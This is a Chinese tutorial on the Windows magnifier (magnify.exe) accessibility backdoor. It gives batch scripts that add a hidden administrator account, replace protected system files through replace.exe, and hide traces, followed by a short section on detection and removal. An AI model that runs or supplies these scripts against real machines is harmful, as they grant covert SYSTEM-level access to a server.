WINDOWS系統(tǒng)后門實例二 圖
放大鏡程序,最狡猾的后門
放大鏡程序(magnify.exe)是Windows 2000/XP/2003系統(tǒng)集成的一個小工具,它是為方便視力障礙用戶而設(shè)計的。在用戶登錄系統(tǒng)前可以通過“Win+U”組合鍵調(diào)用該工具,因此攻擊者就用精心構(gòu)造的magnify.exe同名文件替換放大鏡程序,從而達到控制服務(wù)器的目的。
通常情況下,攻擊者通過構(gòu)造的magnify.exe程序創(chuàng)建一個管理員用戶,然后登錄系統(tǒng)。當然有的時候他們也會通過其直接調(diào)用命令提示符(cmd.exe)或者系統(tǒng)shell(explorer.exe)。需要說明的是,這樣調(diào)用的程序都是system權(quán)限,即系統(tǒng)最高權(quán)限。不過,以防萬一當管理員在運行放大鏡程序時發(fā)現(xiàn)破綻,攻擊者一般通過該構(gòu)造程序完成所需的操作后,最后會運行真正的放大鏡程序,以蒙騙管理員。其利用的方法是:
(1)構(gòu)造批處理腳本
- @echo off
- net user gslw$ test168 /add
- net localgroup administrators gslw$ /add
- %Windir%\system32\nagnify.exe
- exit
將上面的腳本保存為magnify.bat,其作用是創(chuàng)建一個密碼為test168的管理員用戶gslw$,最后運行改名后的放大鏡程序nagnify.exe。(圖2)
(2)文件格式轉(zhuǎn)換
因為批處理文件magnify.bat的后綴是bat,必須要將其轉(zhuǎn)換為同名的exe文件才可以通過組合鍵Win+U調(diào)用。攻擊者一般可以利用WinRar構(gòu)造一個自動解壓的exe壓縮文件,當然也可以利用bat2com、com2exe進行文件格式的轉(zhuǎn)換。我們就以后面的方法為例進行演示。
打開命令行,進入bat2com、com2exe工具所在的目錄,然后運行命令“bat2com magnify.bat”將magnify.bat轉(zhuǎn)換成magnify.com,繼續(xù)運行命令“com2exe magnify.com”將magnify.com轉(zhuǎn)換成magnify.exe,這樣就把批處理文件轉(zhuǎn)換成和放大鏡程序同名的程序文件。(圖3)
(3)放大鏡文件替換
下面就需要用構(gòu)造的magnify.exe替換同名的放大鏡程序文件,由于Windows對系統(tǒng)文件的自我保護,因此不能直接替換,不過Windows提供了一個命令replace.exe,通過它我們可以替換系統(tǒng)文件。另外,由于系統(tǒng)文件在%Windir%\system32\dllcache中有備份,為了防止文件替換后又重新還原,所有我們首先要替換該目錄下的magnify.exe文件。假設(shè)構(gòu)造的magnify.exe文件在%Windir%目錄下,我們可以通過一個批處理即可實現(xiàn)文件的替換。
- @echo off
- copy %Windir%\system32\dllcache\magnify.exe nagnify.exe
- copy %Windir%\system32\magnify.exe nagnify.exe
- replace.exe %Windir%\magnify.exe %Windir%\system32\dllcache
- replace.exe %Windir%\magnify.exe %Windir%\system32
- exit
上面批處理的功能是,首先將放大鏡程序備份為nagnify.exe,然后用同名的構(gòu)造程序?qū)⑵涮鎿Q。(圖4)
(4)攻擊利用
當完成上述操作后,一個放大鏡后門就做成了。然后攻擊者通過遠程桌面連接服務(wù)器,在登錄界面窗口摁下本地鍵盤的“Win+U”組合鍵,選擇運行其中的“放大鏡”,此刻就在服務(wù)器上創(chuàng)建了一個管理員用戶gslw$并打開了放大鏡工具,然后攻擊者就開業(yè)通過該帳戶登錄服務(wù)器。當然,攻擊者在斷開登錄前會刪除所有與該帳戶相關(guān)的信息,以防被管理員發(fā)現(xiàn)。(圖5)
(5)防范措施
進入%Windir%\system32\查看magnify.exe的文件圖標是否是原來的放大鏡的圖標,如果不是的話極有可能被植入了放大鏡后門。當然,有的時候攻擊者也會將其文件圖標更改為和原放大鏡程序的圖標一樣。此時我們可以查看magnify.exe文件的大小和修改時間,如果這兩樣有一項不符就比較懷疑了。
我們也可以先運行magnify.exe,然后運行l(wèi)usrmgr.msc查看是否有可疑的用戶。如果確定服務(wù)器被放置了放大鏡后門,首先要刪除該文件,然后恢復(fù)正常的放大鏡程序。當然,我們也可以做得更徹底一些,用一個無關(guān)緊要的程序替換放大鏡程序。甚至我們也可以以其人之道還治其人之身,構(gòu)造一個magnify.exe,通過其警告攻擊者或者進行入侵監(jiān)控和取證。
與放大鏡后門類似的還有“粘滯鍵”后門,即按下SHIEF鍵五次可以啟動粘滯鍵功能,其利用和防范措施與放大鏡后門類似,只是將magnify.exe換成了sethc.exe。
【編輯推薦】
